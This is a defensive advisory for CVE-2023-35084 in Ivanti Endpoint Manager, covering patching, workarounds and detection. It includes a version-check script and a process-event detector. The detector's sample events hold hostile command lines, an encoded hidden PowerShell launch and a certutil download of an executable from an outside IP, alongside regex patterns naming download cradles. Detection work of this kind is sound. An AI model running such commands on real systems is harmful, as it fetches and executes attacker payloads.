CVE-2023-35084
📋 TL;DR
CVE-2023-35084 is a critical remote code execution vulnerability in Ivanti Endpoint Manager (formerly LANDesk Management Suite) caused by deserialization of untrusted data. An unauthenticated attacker who can reach the vulnerable interface can execute arbitrary commands on the core server. Ivanti Endpoint Manager 2022 SU3 and earlier are affected.
💻 Affected Systems
- Ivanti Endpoint Manager
- LANDesk Management Suite
📦 What is this software?
Ivanti Endpoint Manager (EPM), formerly LANDesk Management Suite, is an endpoint management platform: a Windows-based core server handles inventory, software distribution, patch management and remote control for agents installed on managed endpoints. Because the core server can push software and commands to every managed machine, compromising it usually means control of the whole managed fleet rather than a single host.
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise allowing attackers to execute arbitrary commands with SYSTEM privileges, install malware, exfiltrate data, and move laterally through the network.
Likely Case
Remote code execution on the core server, followed by abuse of its own management channels to push ransomware, steal data or install persistent backdoors on managed endpoints.
If Mitigated
Limited impact if proper network segmentation and access controls prevent external access to vulnerable interfaces.
🎯 Exploit Status
Multiple proof-of-concept exploits are publicly available, and security researchers have reported exploitation in the wild. Treat reachable instances as already targeted: patch first, then hunt for signs of compromise rather than waiting for confirmation. Check the vendor advisory and CISA's Known Exploited Vulnerabilities catalog for the current status.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2022 SU4 or later
Vendor Advisory: https://forums.ivanti.com/s/article/SA-2023-08-08-CVE-2023-35084
Restart Required: Yes
Instructions:
1. Download the 2022 SU4 (or later) update from Ivanti's support portal.
2. Back up the current installation and its database before changing anything.
3. Apply the update following Ivanti's documentation.
4. Restart the Ivanti Endpoint Manager services (and the server itself if the installer asks for it).
5. Confirm the reported product version is 2022 SU4 or later.
🔧 Temporary Workarounds
Network Isolation
Restrict network access to the Ivanti Endpoint Manager core server to trusted management networks only; it should never be reachable from the internet.
# Configure firewall rules to block untrusted access to Ivanti ports (typically 80, 443, 9595)
Disable Unnecessary Services
Temporarily stop the vulnerable service components if they are not critically needed. Stopping core services halts endpoint management entirely, and the exact service names differ between versions, so list the installed LANDesk/Ivanti services first and substitute the real names:
# Windows: sc stop "LANDesk Management Suite"
# Windows: sc config "LANDesk Management Suite" start= disabled
🧯 If You Can't Patch
- Implement strict network segmentation to isolate the Ivanti server from internet and untrusted networks
- Deploy application control solutions to prevent execution of unauthorized binaries on the server
🔍 How to Verify
Check if Vulnerable:
Check the installed version of Ivanti Endpoint Manager. 2022 SU3 and earlier are vulnerable; 2022 SU4 and later contain the fix.
Check Version:
# Windows: check the registry under HKLM\SOFTWARE\LANDesk\ManagementSuite\CurrentVersion\Version, or Installed Programs in Control Panel
Verify Fix Applied:
Confirm that the product version reported in the Ivanti console (or by the file versions in the installation directory) is 2022 SU4 or later, and that the services came back up after the update.
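The version comparison above, as an added example that is not code from the original page or from Ivanti. It compares the "YEAR SUn" release label that the Ivanti console displays, treating a bare year (GA, no service update) as SU0 and a later year as newer than any 2022 service update. Whether the registry value the page cites holds that same label or a dotted build number is an assumption to confirm on a known-good host; the registry path and value name are taken from the page as written.

```python
"""Decide whether an Ivanti Endpoint Manager release label is at or past the
fix level named on this page (2022 SU4).

Added example, not from the original page or from Ivanti. It parses the
'YEAR SUn' label the console shows; the registry read is Windows-only and
assumes that value carries the same label.
"""
import re
import sys
from typing import Optional

FIXED = (2022, 4)  # first fixed release per the vendor advisory: 2022 SU4

# '2022 SU3', '2022 su3', '2022' (GA) all match; dotted build numbers do not.
_LABEL = re.compile(r"^\s*(\d{4})(?:\s*SU\s*(\d+))?\s*$", re.IGNORECASE)


def parse_release(label: str) -> tuple:
    """'2022 SU3' -> (2022, 3); a bare '2022' (no service update) -> (2022, 0)."""
    m = _LABEL.match(label)
    if not m:
        raise ValueError(
            f"unrecognised release label {label!r}; a dotted build number needs "
            "Ivanti's build-to-SU mapping, which this check does not carry")
    return int(m.group(1)), int(m.group(2) or 0)


def is_vulnerable(label: str) -> bool:
    """True when the release is older than 2022 SU4 (tuple order: year, then SU)."""
    return parse_release(label) < FIXED


def read_registry_version() -> Optional[str]:
    """Windows only: read the value the page points at.

    Assumption: key SOFTWARE\\LANDesk\\ManagementSuite\\CurrentVersion with a
    'Version' value, as the page writes it. 32-bit installs may sit under
    WOW6432Node instead. Returns None on non-Windows hosts.
    """
    if sys.platform != "win32":
        return None
    import winreg  # standard library, Windows only
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"SOFTWARE\LANDesk\ManagementSuite\CurrentVersion") as key:
        value, _ = winreg.QueryValueEx(key, "Version")
    return str(value)


if __name__ == "__main__":
    # Off Windows, fall back to a constructed label so the script still demonstrates the check.
    label = read_registry_version() or "2022 SU3"
    print(label, "-> vulnerable" if is_vulnerable(label) else "-> fixed")
```

If the registry reports a dotted build number rather than a release label, `parse_release` refuses it on purpose: map the build to its service update with Ivanti's release notes rather than guessing a threshold.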
📡 Detection & Monitoring
Log Indicators:
- Unusual process creation events from the Ivanti service account
- Suspicious network connections originating from the Ivanti server
- Errors or warnings in the Ivanti application logs (and the web server logs on the core server) related to deserialization failures, especially shortly before unexpected process creation events
Network Indicators:
- Unusual outbound connections from the Ivanti server
- Traffic to known malicious IPs from the server
- Exploit-specific patterns in HTTP requests to Ivanti endpoints
SIEM Query:
source="ivanti*" AND (process_name="cmd.exe" OR process_name="powershell.exe") AND user="SYSTEM"
Field names are illustrative and must be mapped to your SIEM's schema. On its own this query is noisy, since SYSTEM launches cmd.exe legitimately (scheduled tasks, for example); narrow it to shells whose parent is the web worker or an Ivanti service process, or whose command line is encoded or downloads content.
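The narrowed detection logic described above, run over constructed process-creation events, as an added example that is not code from the original page or from Ivanti. Field names follow a normalised Windows Security 4688 / Sysmon event 1 record; the parent-process list (w3wp.exe, the IIS worker assumed to host the web-facing code on the core server) and the sample events are assumptions to adjust to what your sensor reports.

```python
"""Detection logic for post-exploitation of CVE-2023-35084 on an Ivanti
Endpoint Manager core server, run over constructed process-creation events.

Added example, not from the original page or from Ivanti. Three rules:
  1. a web worker process spawns a shell or LOLBin (regardless of user);
  2. a command line carries encoded PowerShell;
  3. a command line contains a download cradle.
A SYSTEM-launched cmd.exe with none of these is deliberately not alerted on.
"""
import json
import re

# Shells and living-off-the-land binaries a web worker has no reason to spawn.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "rundll32.exe",
    "mshta.exe", "wscript.exe", "cscript.exe", "bitsadmin.exe",
}
# Parents that host web-facing code on the core server (assumption: IIS worker).
WEB_PARENTS = {"w3wp.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_PS = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}", re.I)
# Common download cradles seen after web-shell style RCE.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
    r"|certutil(?:\.exe)?\s.*-urlcache", re.I)

# Constructed sample telemetry (newline-delimited JSON), not real events.
SAMPLE_EVENTS = r'''
{"id": 1, "user": "IIS APPPOOL\\DefaultAppPool", "parent_image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c whoami"}
{"id": 2, "user": "NT AUTHORITY\\SYSTEM", "parent_image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"id": 3, "user": "NT AUTHORITY\\SYSTEM", "parent_image": "C:\\Windows\\System32\\svchost.exe", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c C:\\Scripts\\nightly-cleanup.bat"}
{"id": 4, "user": "CORP\\jsmith", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad.exe"}
{"id": 5, "user": "NT AUTHORITY\\SYSTEM", "parent_image": "C:\\Windows\\System32\\svchost.exe", "image": "C:\\Windows\\System32\\certutil.exe", "command_line": "certutil.exe -urlcache -split -f http://203.0.113.10/a.exe C:\\ProgramData\\a.exe"}
'''


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list:
    """Parse newline-delimited JSON records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def score_event(ev: dict) -> list:
    """Return the reasons an event is suspicious (empty list if none)."""
    child = basename(ev.get("image", ""))
    parent = basename(ev.get("parent_image", ""))
    cmdline = ev.get("command_line", "")
    reasons = []
    if parent in WEB_PARENTS and child in SUSPICIOUS_CHILDREN:
        reasons.append(f"web worker {parent} spawned {child}")
    if ENCODED_PS.search(cmdline):
        reasons.append("encoded PowerShell command line")
    if DOWNLOAD_CRADLE.search(cmdline):
        reasons.append("download cradle in command line")
    return reasons


def detect(events: list) -> list:
    """Score every event and keep those with at least one reason, in input order."""
    alerts = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            alerts.append({"id": ev["id"], "user": ev.get("user"), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(f"event {alert['id']} ({alert['user']}): " + "; ".join(alert["reasons"]))
```

Against the sample, events 1, 2 and 5 alert and the scheduled-task cmd.exe (event 3) does not, which is the point of keying on parent process and command-line content rather than on the SYSTEM account alone.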